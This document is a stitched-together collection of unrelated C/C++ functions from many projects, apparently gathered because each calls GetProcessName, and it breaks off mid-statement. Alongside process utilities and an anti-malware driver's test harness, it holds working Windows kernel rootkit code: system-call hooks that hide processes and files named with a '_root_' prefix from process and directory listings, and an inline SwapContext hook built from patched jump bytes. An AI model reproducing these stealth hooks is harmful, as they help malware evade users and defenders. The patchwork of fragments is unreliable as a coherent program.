static boolean CheckFileMaps(int pid, const char* mountPoint) { FILE* file; char buffer[PATH_MAX + 100]; boolean mapOpen = false; sprintf(buffer, "/proc/%d/maps", pid); file = fopen(buffer, "r"); if (!file) return false; while (!mapOpen && fgets(buffer, sizeof(buffer), file)) { // skip to the path const char* path = strchr(buffer, '/'); if (path && PathMatchesMountPoint(path, mountPoint)) { char name[PATH_MAX]; GetProcessName(pid, name); LOG_ERROR("process %s (%d) has open file map for %s\n", name, pid, path); mapOpen = true; } } fclose(file); return mapOpen; }
/* _________________________________________________________ . usually no object attributes - just a hSection pointer. . _________________________________________________________ */ NTSTATUS NewNtCreateProcess( OUT PHANDLE phProcess, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN HANDLE hParentProcess, IN BOOLEAN bInheritParentHandles, IN HANDLE hSection OPTIONAL, IN HANDLE hDebugPort OPTIONAL, IN HANDLE hExceptionPort OPTIONAL) { int rc; char ParentDirectory[1024]; PUNICODE_STRING Parent=NULL; CHAR aProcessName[PROCNAMELEN]; GetProcessName( aProcessName ); DbgPrint("rootkit: NewNtCreateProcess() from %s\n", aProcessName); DumpObjectAttributes(ObjectAttributes); if(hSection) DbgPrint("rootkit: launching NtCreateProcess w/ hSection 0x%X\n", hSection); rc=((NTCREATEPROCESS)(OldNtCreateProcess)) ( phProcess, DesiredAccess, ObjectAttributes, hParentProcess, bInheritParentHandles, hSection, hDebugPort, hExceptionPort); if(phProcess) DbgPrint("rootkit: phProcess 0x%X\n", *phProcess); DbgPrint("rootkit: NtCreateProcess : rc = %x\n", rc); return rc; }
std::wstring ProcessInfo::GetProcessNameByPid(DWORD processId) { Handle hProcess(::OpenProcess(PROCESS_QUERY_INFORMATION, false, processId)); if (hProcess) return GetProcessName(hProcess.get()); return L""; }
NTSTATUS NewZwCreateSection ( OUT PHANDLE phSection, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE hFile OPTIONAL ) { int rc; CHAR aProcessName[PROCNAMELEN]; GetProcessName( aProcessName ); DbgPrint("rootkit: NewZwCreateSection() from %s\n", aProcessName); DumpObjectAttributes(ObjectAttributes); if(AllocationAttributes & SEC_FILE) DbgPrint("AllocationAttributes & SEC_FILE\n"); if(AllocationAttributes & SEC_IMAGE) DbgPrint("AllocationAttributes & SEC_IMAGE\n"); if(AllocationAttributes & SEC_RESERVE) DbgPrint("AllocationAttributes & SEC_RESERVE\n"); if(AllocationAttributes & SEC_COMMIT) DbgPrint("AllocationAttributes & SEC_COMMIT\n"); if(AllocationAttributes & SEC_NOCACHE) DbgPrint("AllocationAttributes & SEC_NOCACHE\n"); DbgPrint("ZwCreateSection hFile == 0x%X\n", hFile); #if 1 if(hFile) { HANDLE newFileH = CheckForRedirectedFile( hFile ); if(newFileH){ hFile = newFileH; } } #endif rc=((ZWCREATESECTION)(OldZwCreateSection)) ( phSection, DesiredAccess, ObjectAttributes, MaximumSize, SectionPageProtection, AllocationAttributes, hFile); if(phSection) { DbgPrint("section handle 0x%X\n", *phSection); } DbgPrint("rootkit: ZwCreateSection : rc = %x\n", rc); return rc; }
NTSTATUS RegProc_EnumValueKey( HANDLE hKey, PVOID pRootObject, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, PVOID pKeyValueInformation, ULONG Length, PULONG pResultLength ) { ULONG ulLength = 0; NAME_BUFFER RegPath = {0}; NTSTATUS Status = STATUS_SUCCESS; WCHAR wzProcName[ MAX_PROCESS_LEN ] = L""; if(!hKey && !pRootObject) return Status; if(ExGetPreviousMode() == KernelMode) return Status; if(KeGetCurrentIrql() >= DISPATCH_LEVEL) return Status; if (FALSE == g_MalwFind.DrvConfig.bGlobalCtrl) { return Status; } RtlZeroMemory( wzProcName, sizeof(WCHAR)*MAX_PROCESS_LEN ); GetProcessName( PsGetCurrentProcess(), wzProcName, MAX_PROCESS_LEN ); // 전역기능 예외 프로세스 판단. if(ISExpProcList_PolicyAll( wzProcName )) { return Status; } ALLOCATE_N_REG_POOL( RegPath ); if(!RegPath.pBuffer) return Status; SET_REG_POOL_ZERO( RegPath ); ulLength = GetRegFullPath( hKey, pRootObject, NULL, &RegPath ); if(ulLength <= 0) { FREE_N_REG_POOL( RegPath ); return STATUS_SUCCESS; } if(KeyValueInformationClass == KeyValueBasicInformation) { } else if(KeyValueInformationClass == KeyValueFullInformation) { } else if(KeyValueInformationClass == KeyValuePartialInformation) { } FREE_N_REG_POOL( RegPath ); return Status; }
/* ________________________________________________ . watch thread creation . ________________________________________________ */ NTSTATUS NewZwCreateThread( OUT PHANDLE phThread, IN ACCESS_MASK AccessMask, IN POBJECT_ATTRIBUTES ObjectAttributes, IN HANDLE hProcess, OUT PCLIENT_ID pClientId, IN PCONTEXT pContext, OUT PSTACKINFO pStackInfo, IN BOOLEAN bSuspended ) { int rc; STACKINFO StackInfo; CHAR aProcessName[PROCNAMELEN]; GetProcessName( aProcessName ); DbgPrint("rootkit: NewZwCreateThread() from %s\n", aProcessName); DumpObjectAttributes(ObjectAttributes); if(bSuspended) DbgPrint("create suspended\n"); DumpContext(pContext); /* dump stack info */ if(pStackInfo) { DbgPrint("StackInfo.TopOfStack=0x%X\n", pStackInfo->TopOfStack); DbgPrint("StackInfo.BottomOfStack=0x%X\n", pStackInfo->BottomOfStack); DbgPrint("StackInfo.OnePageBelowTopOfStack=0x%X\n", pStackInfo->OnePageBelowTopOfStack); } DbgPrint("parent process 0x%X\n", hProcess); rc = ((ZWCREATETHREAD)(OldZwCreateThread)) ( phThread, AccessMask, ObjectAttributes, hProcess, pClientId, pContext, pStackInfo, bSuspended ); if(phThread) DbgPrint("thread handle 0x%X\n", *phThread); DbgPrint("ZwCreateThread : rc = %x\n", rc); DumpContext(pContext); return rc; }
NTSTATUS RegProc_DeleteKey( HANDLE hKey, PVOID pRootObject, PUNICODE_STRING pSubKey ) { ULONG ulLength = 0; NAME_BUFFER RegPath = {0}; NTSTATUS Status = STATUS_SUCCESS; WCHAR wzProcName[ MAX_PROCESS_LEN ] = L""; if(!hKey && !pRootObject) return Status; if(ExGetPreviousMode() == KernelMode) return Status; if(KeGetCurrentIrql() >= DISPATCH_LEVEL) return Status; if (FALSE == g_MalwFind.DrvConfig.bGlobalCtrl) { return Status; } RtlZeroMemory( wzProcName, sizeof(WCHAR)*MAX_PROCESS_LEN ); GetProcessName( PsGetCurrentProcess(), wzProcName, MAX_PROCESS_LEN ); // 전역기능 예외프로세스 판단. if(ISExpProcList_PolicyAll( wzProcName )) { return Status; } ALLOCATE_N_REG_POOL( RegPath ); if(!RegPath.pBuffer) return Status; SET_REG_POOL_ZERO( RegPath ); ulLength = GetRegFullPath( hKey, pRootObject, pSubKey, &RegPath ); if(ulLength <= 0) { FREE_N_REG_POOL( RegPath ); return STATUS_SUCCESS; } _wcslwr( RegPath.pBuffer ); if( wcsstr(RegPath.pBuffer, SVCNAME_AGENT) || wcsstr(RegPath.pBuffer, SVCNAME_DRIVER) ) { KdPrint(("RegProc_DeleteKey=[%ws] \n", RegPath.pBuffer )); // SetupDir Control == FALSE:제어안함 TRUE: 제어함 if (g_MalwFind.DrvConfig.bGlobalCtrl) { Status = STATUS_ACCESS_DENIED; KdPrint(("Ret--STATUS_ACCESS_DENIED RegPath=%ws \n", RegPath.pBuffer)); } } FREE_N_REG_POOL( RegPath ); return Status; }
int kill(pid_t pid, int sig) { HANDLE hProcess; char MyProcessName[MAX_PATH]; char ProcessNameToCheck[MAX_PATH]; if (sig == 0) { if ((hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid)) == NULL) return -1; else { CloseHandle(hProcess); GetProcessName(getpid(), MyProcessName); GetProcessName(pid, ProcessNameToCheck); if (strcmp(MyProcessName, ProcessNameToCheck) == 0) return 0; return -1; } } else return 0; }
int SystemHandleInformation::HANDLE_INFORMATION::Insert( CSystemInfoListCtrl& list, BOOL bPid, size_t iItem, size_t iItemCount) const { iItem; // use var iItemCount; // use var CString strPID, strProcesName; CString strHandle, strAccess, strType, strTypeNum, strName; strHandle.Format(_T("0x%08IX"), sh.HandleValue); strAccess.Format( _T("0x%08X"), sh.GrantedAccess ); SystemHandleInformation::GetTypeToken(sh.HandleValue, strType, sh.GetPid()); SystemHandleInformation::GetName(sh.HandleValue, strName, sh.GetPid()); const DWORD typeFlags = 0; // In fact I don't know what it means in Windows internals strTypeNum.Format(_T("%d"), sh.ObjectTypeIndex); if( typeFlags != 0 ) { CString d; d.Format( _T("0x%X | "), typeFlags ); strTypeNum = d + strTypeNum; } int sub = 0; int iListItemCount = list.GetItemCount(); int nPos = list.InsertItem( iListItemCount, _T("") ); list.SetItemText( nPos, sub+0, strHandle ); if( bPid ) { strPID.Format( _T("%d"), sh.GetPid() ); list.SetItemText( nPos, sub+1, strPID ); sub++; strProcesName = GetProcessName(sh.GetPid()); list.SetItemText( nPos, sub+1, strProcesName ); sub++; } list.SetItemText( nPos, sub+1, strAccess ); list.SetItemText( nPos, sub+2, strType ); list.SetItemText( nPos, sub+3, strTypeNum ); list.SetItemText( nPos, sub+4, strName ); return nPos; }
static boolean CheckSymLink(int pid, const char* mountPoint, const char* name, const char* message) { char path[PATH_MAX]; char link[PATH_MAX]; sprintf(path, "/proc/%d/%s", pid, name); if (ReadSymLink(path, link) && PathMatchesMountPoint(link, mountPoint)) { char name[PATH_MAX]; GetProcessName(pid, name); LOG_ERROR("process %s (%d) has %s in %s\n", name, pid, message, mountPoint); return true; } else return false; }
Menu* MakeProcessesMenu(bool popup) { DWORD ph[1024]; DWORD phs; if(!EnumProcesses(ph, 1024, &phs)) phs=0; phs/=sizeof(DWORD); char buff[128]; sprintf(buff, "Process Killer Menu - %ld", phs); Menu *m = MakeNamedMenu(buff, "IDRoot_processes", popup); for (int i=phs-1; i>=0; i--){ char name[128], buf[80]; if (GetProcessName(ph[i], name)){ sprintf(buf, "@KillProcess %ld", ph[i]); MakeMenuItem(m, name, buf, false); } } return m; }
//发送对手进程名数据至服务器 void CProcessReport::OnProcessReport() { std::wstring strRunProcName = GetProcessName(); //查询获取正在运行的对手进程名 if(strRunProcName == _T("")) { return; } //上传对手进程名数据至服务器 core::ReportCollectInfoEvent *runProcEvent = new core::ReportCollectInfoEvent(); core::ReportCollectInfoEvent::Key2Value runProc; runProc.key = COLLECT_INFO_PROCESS; runProc.value = strRunProcName; runProcEvent->vecCollecInfo.push_back(runProc); Event _event = MakeEvent<MODULE_ID_HALL>()(core::EVENT_VALUE_CORE_REPORT_COLLECT_INFO, MODULE_ID_CORE,0,0,0,runProcEvent); g_HallModule->m_pModuleManager->PushEvent(_event); }
int SystemHandleInformation::HANDLE_INFORMATION::InsertFile( CSystemInfoListCtrl& list, BOOL bPid, size_t iItem, size_t iItemCount, LPCTSTR szDevice, LPCTSTR szPath) const { iItem; // use var iItemCount; // use var CString strPID, strProcesName; CString strHandle, strName, strPath, strDevice; strHandle.Format(_T("0x%08IX"), sh.HandleValue); strPath = szPath; strDevice = szDevice; int pos = strDevice.ReverseFind( _T('\\') ); strName = strDevice.Mid( pos + 1 ); int sub = 0; int iListItemCount = list.GetItemCount(); int nPos = list.InsertItem( iListItemCount, _T("") ); list.SetItemText( nPos, sub+0, strHandle ); if( bPid ) { strPID.Format(_T("%d"), sh.GetPid()); list.SetItemText( nPos, sub+1, strPID ); sub++; strProcesName = GetProcessName(sh.GetPid()); list.SetItemText( nPos, sub+1, strProcesName ); sub++; } list.SetItemText( nPos, sub+1, strName ); list.SetItemText( nPos, sub+2, strPath ); list.SetItemText( nPos, sub+3, strDevice ); return nPos; }
bool bCheck(CString strName, CString strKey, CString strLicense) { bool bRet = false; CRC4_ rc; rc.put_Key(_T("a4b3c0d6e8f1a1b9c8d3e1f0a2b8c1d4e1f6a")); // CString str = rc.Crypt2(_T("国家开发银行-20090701")); // CString strMW = rc.Crypt(_T("思博智创-20090701")); TCHAR szExe[MAX_PATH] = {0}; TCHAR szCompany[MAX_PATH] = {0}; TCHAR szExpriseDate[MAX_PATH] = {0}; CString strDe = rc.Crypt2(strLicense); //int iPos = strDe.ReverseFind(_T('-')); //CString strLeft = strDe.Left(iPos); //CString strRight = strDe.Mid(iPos+1); _stscanf(strDe.GetBuffer(),_T("%s %s %s"),szExe,szCompany,szExpriseDate); CString strExe = GetProcessName(); if (strExe.CompareNoCase(szExe) == 0) { if (strName.CompareNoCase(szCompany) == 0) { SYSTEMTIME ti = {0}; ::GetSystemTime(&ti); CString strSysTime; strSysTime.Format(_T("%04d%02d%02d"),ti.wYear,ti.wMonth,ti.wDay); CString strTime(szExpriseDate); if (strSysTime<strTime) { bRet = true; } } } return bRet; }
void GetProcessNameList( ProcessNameList *Ret ) { HANDLE hProcessSnap; PROCESSENTRY32 pe32; // Take a snapshot of all processes in the system. hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); if( hProcessSnap == INVALID_HANDLE_VALUE ) { // printf( TEXT("CreateToolhelp32Snapshot (of processes)") ); return; } // Set the size of the structure before using it. pe32.dwSize = sizeof( PROCESSENTRY32 ); if( !Process32First( hProcessSnap, &pe32 ) ) { // printf( TEXT("Process32First") ); // show cause of failure CloseHandle( hProcessSnap ); // clean the snapshot object return; } do { Ret->Count++; char *Name = GetProcessName( pe32.th32ProcessID ); if( Name != NULL ) { if( Name[0] == ' ' ) { Ret->Names.push_back( _strdup( pe32.szExeFile ) ); free( Name ); } else Ret->Names.push_back( Name ); } } while( Process32Next( hProcessSnap, &pe32 ) ); CloseHandle( hProcessSnap ); return; }
static boolean CheckFileDescriptorSymLinks(int pid, const char* mountPoint) { DIR* dir; struct dirent* de; boolean fileOpen = false; char path[PATH_MAX]; char link[PATH_MAX]; int parent_length; // compute path to process's directory of open files sprintf(path, "/proc/%d/fd", pid); dir = opendir(path); if (!dir) return false; // remember length of the path parent_length = strlen(path); // append a trailing '/' path[parent_length++] = '/'; while ((de = readdir(dir)) != 0 && !fileOpen) { if (!strcmp(de->d_name, ".") || !strcmp(de->d_name, "..")) continue; // append the file name, after truncating to parent directory path[parent_length] = 0; strcat(path, de->d_name); if (ReadSymLink(path, link) && PathMatchesMountPoint(link, mountPoint)) { char name[PATH_MAX]; GetProcessName(pid, name); LOG_ERROR("process %s (%d) has open file %s\n", name, pid, link); fileOpen = true; } } closedir(dir); return fileOpen; }
void MakeFileNameByProcess(wchar_t* output, size_t cchOutput, HANDLE process, const wchar_t* destFolder, const wchar_t* prefix, const wchar_t* ext) { if (output != NULL && cchOutput > 0) { // 폴더 얻기 wchar_t tempDir[MAX_PATH] = { 0, }; if (destFolder != NULL) { ::wcscpy_s(tempDir, _countof(tempDir), destFolder); } else // 폴더가 지정되지 않았다면 프로세스가 존재하는 폴더를 선택한다. { GetProcessFolder(process, tempDir, _countof(tempDir)); } // 프로세스 이름 얻기 wchar_t processName[_MAX_FNAME] = { 0, }; GetProcessName(process, processName, _countof(processName)); MakeFileName(output, cchOutput, processName, tempDir, prefix, ext); } }
//__fastcall SwapContext(PKTHREAD CurrentThread,PKTHREAD NextThread) __declspec(naked) void HooK(){ GetProcessName(); /*before jumping back execute the overwritten functions*/ //807e3900 cmp byte ptr [esi+39h],0 //7404 je nt!SwapContext+0xa (828bdaea) __asm{ cmp byte ptr[esi+39h],0 /*je address , replaced in runtime*/ _emit 0x0F _emit 0x84 _emit 0xAA _emit 0xAA _emit 0xAA _emit 0xAA /*jmp just after the patched bytes*/ _emit 0xE9 _emit 0xBB _emit 0xBB _emit 0xBB _emit 0xBB } }
NTSTATUS NewZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength ) { NTSTATUS rc; CHAR aProcessName[PROCNAMELEN]; GetProcessName( aProcessName ); DbgPrint("rootkit: NewZwQuerySystemInformation() from %s\n", aProcessName); rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) ( SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength ); if( NT_SUCCESS( rc ) ) { // double check the process name, if it starts w/ '_root_' DO NOT // apply any stealth if(0 == memcmp(aProcessName, "_root_", 6)) { DbgPrint("rootkit: detected system query from _root_ process\n"); } else if( 5 == SystemInformationClass ) { // this is a process list, look for process names that start with // '_root_' struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation; struct _SYSTEM_PROCESSES *prev = NULL; while(curr) { //struct _SYSTEM_PROCESSES *next = ((char *)curr += curr->NextEntryDelta); ANSI_STRING process_name; RtlUnicodeStringToAnsiString( &process_name, &(curr->ProcessName), TRUE); if( (0 < process_name.Length) && (255 > process_name.Length) ) { if(0 == memcmp( process_name.Buffer, "_root_", 6)) { ////////////////////////////////////////////// // we have a winner! ////////////////////////////////////////////// char _output[255]; char _pname[255]; memset(_pname, 0, 255); memcpy(_pname, process_name.Buffer, process_name.Length); sprintf( _output, "rootkit: hiding process, pid: %d\tname: %s\r\n", curr->ProcessId, _pname); DbgPrint(_output); if(prev) { if(curr->NextEntryDelta) { // make prev skip this entry prev->NextEntryDelta += curr->NextEntryDelta; } else { // we are last, so make prev the end prev->NextEntryDelta = 0; } } else { if(curr->NextEntryDelta) { // we are first in the list, so move it forward (char *)SystemInformation += curr->NextEntryDelta; } else { // we are the only process! SystemInformation = NULL; } } } } RtlFreeAnsiString(&process_name); prev = curr; if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta); else curr = NULL; } } } return(rc); }
NTSTATUS NewZwQueryDirectoryFile( IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInformationBuffer, IN ULONG FileInformationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN bReturnOnlyOneEntry, IN PUNICODE_STRING PathMask OPTIONAL, IN BOOLEAN bRestartQuery ) { NTSTATUS rc; CHAR aProcessName[PROCNAMELEN]; GetProcessName( aProcessName ); DbgPrint("rootkit: NewZwQueryDirectoryFile() from %s\n", aProcessName); rc=((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) ( hFile, /* this is the directory handle */ hEvent, IoApcRoutine, IoApcContext, pIoStatusBlock, FileInformationBuffer, FileInformationBufferLength, FileInfoClass, bReturnOnlyOneEntry, PathMask, bRestartQuery); if( NT_SUCCESS( rc ) && (FileInfoClass == FileDirectoryInformation || FileInfoClass == FileFullDirectoryInformation || FileInfoClass == FileIdFullDirectoryInformation || FileInfoClass == FileBothDirectoryInformation || FileInfoClass == FileIdBothDirectoryInformation || FileInfoClass == FileNamesInformation ) ) { if(0 == memcmp(aProcessName, "_root_", 6)) { DbgPrint("rootkit: detected file/directory query from _root_ process\n"); } else { PVOID p = FileInformationBuffer; PVOID pLast = NULL; BOOL bLastOne; do { bLastOne = !getDirEntryLenToNext(p,FileInfoClass); // compare directory-name prefix with '_root_' to decide if to hide or not. if (getDirEntryFileLength(p,FileInfoClass) >= 12) { if( RtlCompareMemory( getDirEntryFileName(p,FileInfoClass), (PVOID)"_\0r\0o\0o\0t\0_\0", 12 ) == 12 ) { if( bLastOne ) { if( p == FileInformationBuffer ) rc = 0x80000006; else setDirEntryLenToNext(pLast,FileInfoClass, 0); break; } else { int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer; int iLeft = (DWORD)FileInformationBufferLength - iPos - getDirEntryLenToNext(p,FileInfoClass); RtlCopyMemory( p, (PVOID)( (char *)p + getDirEntryLenToNext(p,FileInfoClass) ), (DWORD)iLeft ); continue; } } } pLast = p; p = ((char *)p + getDirEntryLenToNext(p,FileInfoClass) ); } while( !bLastOne ); } } return(rc); }
//+ ---------------------------------------------------------------------------------------- int main(int argc, char* argv[]) { BYTE* pEvt; gpModuleName = GetProcessName(gModuleName, sizeof(gModuleName)); if (gpModuleName == NULL) return -1; HANDLE hEventAppear = CreateEvent(NULL, FALSE, FALSE, NULL); if (hEventAppear == NULL) return -2; //+ ---------------------------------------------------------------------------------------- //+ system test #ifdef _check_system Log.AddToLog(L"Starting system interceptor check...\n"); { CheckJob_System SystemJob(&gDrvEventList); if (false == SystemJob.Start()) { Log.AddToLog(L"Can't start check system !"); gDrvEventList.SetError(_ERR_DRVFAULT); } else { SystemJob.ChangeActiveStatus(true); //+ ---------------------------------------------------------------------------------------- //+ open process HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId()); if (hProcess != NULL) { Log.AddToLog(L"protection fault - process opened!"); gDrvEventList.SetError(_ERR_DRVFAULT); CloseHandle(hProcess); } //+ ---------------------------------------------------------------------------------------- //+ create process (ex) PROCESS_INFORMATION pi; STARTUPINFO si; ZeroMemory( &si, sizeof(si) ); si.cb = sizeof(si); ZeroMemory( &pi, sizeof(pi) ); WCHAR cmdline[1024]; if (!ExpandEnvironmentStrings(L"\"%ComSpec%\" /C echo app launched!", cmdline, sizeof(cmdline))) gDrvEventList.SetError(_ERR_INTERNAL); else { if (CreateProcess(NULL, cmdline, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi)) { Log.AddToLog(L"protection fault - process started!"); gDrvEventList.SetError(_ERR_DRVFAULT); WaitForSingleObject(pi.hProcess,INFINITE); } } //+ ---------------------------------------------------------------------------------------- //+ terminate process TerminateProcess((HANDLE) -1, -2); SystemJob.ChangeActiveStatus(false); } while ((pEvt = gDrvEventList.GetFirst()) != NULL) { Log.AddToLog((PEVENT_TRANSMIT) pEvt); gDrvEventList.Free(pEvt); } } #endif //- end system test //- ---------------------------------------------------------------------------------------- //+ ---------------------------------------------------------------------------------------- //+ file test #ifdef _check_file Log.AddToLog(L"Starting file interceptor check...\n"); { CheckJob_File FileJob(&gDrvEventList); if (false == FileJob.Start()) { Log.AddToLog(L"Can't start check file interceptor!"); gDrvEventList.SetError(_ERR_DRVFAULT); } else { FileJob.SetAllowEvents(true); FileJob.ChangeActiveStatus(true); #define _testfilename L"TestFile.tst" #define _testfilename_renamed L"TestFile renamed.tst" #define _testfilename_create L"TestFile check create.tst" HANDLE hTestFile = CreateFile(_testfilename, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (hTestFile == INVALID_HANDLE_VALUE) { FileJob.ChangeActiveStatus(false); Log.AddToLog(L"Can't create file TestFile.tst for test"); gDrvEventList.SetError(_ERR_DRVFAULT); FileJob.ChangeActiveStatus(true); } else { DWORD dwBytes; BYTE buf[1024]; ZeroMemory(buf, sizeof(buf)); WriteFile(hTestFile, buf, sizeof(buf), &dwBytes, NULL); if (dwBytes != sizeof(buf)) { Log.AddToLog(L"!Write to TestFile.tst failed"); gDrvEventList.SetError(_ERR_INTERNAL); } FlushFileBuffers(hTestFile); SetFilePointer(hTestFile, 0, NULL, FILE_BEGIN); ReadFile(hTestFile, buf, sizeof(buf), &dwBytes, NULL); if (dwBytes != sizeof(buf)) { Log.AddToLog(L"!Read from TestFile.tst failed"); gDrvEventList.SetError(_ERR_INTERNAL); } CloseHandle(hTestFile); MoveFile(_testfilename, _testfilename_renamed); DeleteFile(_testfilename_renamed); // check deny create file FileJob.SetAllowEvents(false); hTestFile = CreateFile(_testfilename_create, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_TEMPORARY | FILE_FLAG_DELETE_ON_CLOSE, NULL); if (hTestFile != INVALID_HANDLE_VALUE) { Log.AddToLog(L"protection fault - file "_testfilename_create L" opened"); gDrvEventList.SetError(_ERR_DRVFAULT); CloseHandle(hTestFile); } } FileJob.ChangeActiveStatus(false); Sleep(100); } while ((pEvt = gDrvEventList.GetFirst()) != NULL) { Log.AddToLog((PEVENT_TRANSMIT) pEvt); gDrvEventList.Free(pEvt); } } #endif //- end files test //- ---------------------------------------------------------------------------------------- //+ ---------------------------------------------------------------------------------------- //+ registry #ifdef _check_regestry Log.AddToLog(L"Starting registry interceptor check...\n"); { CheckJob_Reg RegJob(&gDrvEventList); if (false == RegJob.Start()) { Log.AddToLog(L"Can't start check file interceptor!"); gDrvEventList.SetError(_ERR_DRVFAULT); } else { RegJob.SetAllowEvents(true); RegJob.ChangeActiveStatus(true); HKEY hKey = NULL; if (ERROR_SUCCESS == RegOpenKey(HKEY_CURRENT_USER, L"Software", &hKey)) { DWORD type; DWORD cbData = 0; RegQueryValueEx(hKey, NULL, 0, &type, NULL, &cbData); RegCloseKey(hKey); //+ ---------------------------------------------------------------------------------------- //+ enum { HKEY hKey; if(ERROR_SUCCESS == RegOpenKey(HKEY_CURRENT_USER, L"SOFTWARE", &hKey)) { TCHAR SubkeyName[512]; DWORD dwSubkeyName = sizeof(SubkeyName); DWORD dwIndex = 0; if (RegEnumKey(hKey, dwIndex, SubkeyName, dwSubkeyName) == ERROR_SUCCESS) { // empty if } RegCloseKey(hKey); } } //+ ---------------------------------------------------------------------------------------- } RegJob.ChangeActiveStatus(false); } while ((pEvt = gDrvEventList.GetFirst()) != NULL) { Log.AddToLog((PEVENT_TRANSMIT) pEvt); gDrvEventList.Free(pEvt); } } #endif //- end registry test //- ---------------------------------------------------------------------------------------- //+ ---------------------------------------------------------------------------------------- //+ filter's queue - add (top, bottom, position), enumerate, /*find*/, enable, disable, delete, reset #ifdef _check_flt Log.AddToLog(L"Starting check filtering system\n"); { CheckJob_Flt FltJob(&gDrvEventList, hEventAppear); if (false == FltJob.Start()) { Log.AddToLog(L"Can't start check filtering system!"); gDrvEventList.SetError(_ERR_DRVFAULT); } else { VERDICT Verdict; byte SinglEevent[512]; PFILTER_EVENT_PARAM pSignleEvt = (PFILTER_EVENT_PARAM) SinglEevent; ZeroMemory(SinglEevent, sizeof(SinglEevent)); pSignleEvt->HookID = FLTTYPE_FLT; pSignleEvt->FunctionMj = 0; pSignleEvt->FunctionMi = 0; pSignleEvt->ParamsCount = 1; pSignleEvt->ProcessingType = PreProcessing; PSINGLE_PARAM pSingleParam = (PSINGLE_PARAM) pSignleEvt->Params; BYTE FltTransmit[4095]; PFILTER_TRANSMIT pFlt = (PFILTER_TRANSMIT) FltTransmit; ZeroMemory(FltTransmit, sizeof(FltTransmit)); FltJob.SetAllowEvents(true); if (false == FltJob.ChangeActiveStatus(true)) { Log.AddToLog(L"Can't activate check filtering system!"); gDrvEventList.SetError(_ERR_DRVFAULT); } else { Log.AddToLog(L"check filter's order..."); ULONG FltArr[4] = {0}; FltArr[1] = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_DEFAULT, FLTTYPE_FLT, 0, 0, 0, PreProcessing, NULL, NULL); FltArr[3] = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_DEFAULT, FLTTYPE_FLT, 0, 0, 0, PreProcessing, NULL, NULL); if (!FltArr[1] || !FltArr[3]) { Log.AddToLog(L"Add filter to FLTTYPE_FLT failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } else { DWORD site = 0; FltArr[0] = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_DEFAULT, FLTTYPE_FLT, 0, 0, 0, PreProcessing, &site, NULL); site = FltArr[1]; FltArr[2] = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_DEFAULT, FLTTYPE_FLT, 0, 0, 0, PreProcessing, &site, NULL); } if (!FltArr[0] || !FltArr[2]) { Log.AddToLog(L"Add filter to FLTTYPE_FLT failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } else { pFlt->m_AppID = FltJob.m_AppID; pFlt->m_FltCtl = FLTCTL_FIRST; if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit))) { Log.AddToLog(L"Enumerating filter's failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } else { int ienum = 0; pFlt->m_FltCtl = FLTCTL_NEXT; do { if (ienum > sizeof(FltArr) / sizeof(FltArr[0])) { Log.AddToLog(L"Filter's count mismatch!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } else { if (FltArr[ienum] != pFlt->m_FilterID) { Log.AddToLog(L"Filter's order mismatch!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } ienum++; } } while (TRUE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit))); } } if (_ERR_DRVFAULT_FLT & gDrvEventList.m_ErrorFlags) { Log.AddToLog(L"further filter's check skipped - errors..."); } else { Log.AddToLog(L"checking enable/disable..."); pFlt->m_FilterID = FltArr[2]; pFlt->m_FltCtl = FLTCTL_DISABLE_FILTER; if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit))) { Log.AddToLog(L"Disable filter failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } pFlt->m_FltCtl = FLTCTL_ENABLE_FILTER; if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit))) { Log.AddToLog(L"Enable filter failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } Log.AddToLog(L"checking delete/reset..."); ResetEvent(hEventAppear); pFlt->m_FltCtl = FLTCTL_DEL; if (FALSE == 